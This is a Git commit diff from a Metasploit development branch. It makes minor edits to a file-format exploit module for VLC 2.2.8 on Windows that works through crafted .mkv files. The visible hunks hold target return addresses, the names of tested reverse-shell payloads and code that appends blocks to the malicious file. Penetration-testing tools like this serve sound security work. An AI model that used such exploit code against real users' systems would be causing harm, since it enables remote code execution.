Minor modifications

GSoC/Meterpreter_Web_Console
Jacob Robles 2018-10-10 12:22:47 -05:00
parent 796579e265
commit 50a7ee5e6a
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 4 additions and 5 deletions

View File

@ -3,7 +3,7 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
class MetasploitModule < Msf::Exploit
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
the second .mkv file is required in order to take the vulnerable code
path and should be placed under the same directory as the .mkv file.
Tested to work with windows/exec, windows/x64/exec, windows/shell/reverse_tcp,
This module has been tested against VLC v2.2.8. Tested with payloads
windows/exec, windows/x64/exec, windows/shell/reverse_tcp,
windows/x64/shell/reverse_tcp. Meterpreter payloads if used can
cause the application to crash instead.
),
@ -46,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
[
'VLC 2.2.8 on Windows 10 x86',
{
'Version' => '2.2.8',
'Platform' => 'win',
'Arch' => [ARCH_X86],
'Ret' => 0x22000020,
@ -81,7 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote
[
'VLC 2.2.8 on Windows 10 x64',
{
'Version' => '2.2.8',
'Platform' => 'win',
'Arch' => [ARCH_X64],
'Ret' => 0x40000040,
@ -298,7 +297,7 @@ class MetasploitModule < Msf::Exploit::Remote
File.open(full_path, 'ab') do |fd|
count.times { fd.write(simple_block) }
end
print_good("Succesfuly appended blocks to #{f1}")
print_good("Succesfully appended blocks to #{f1}")
end
def file_format_filename(name = '')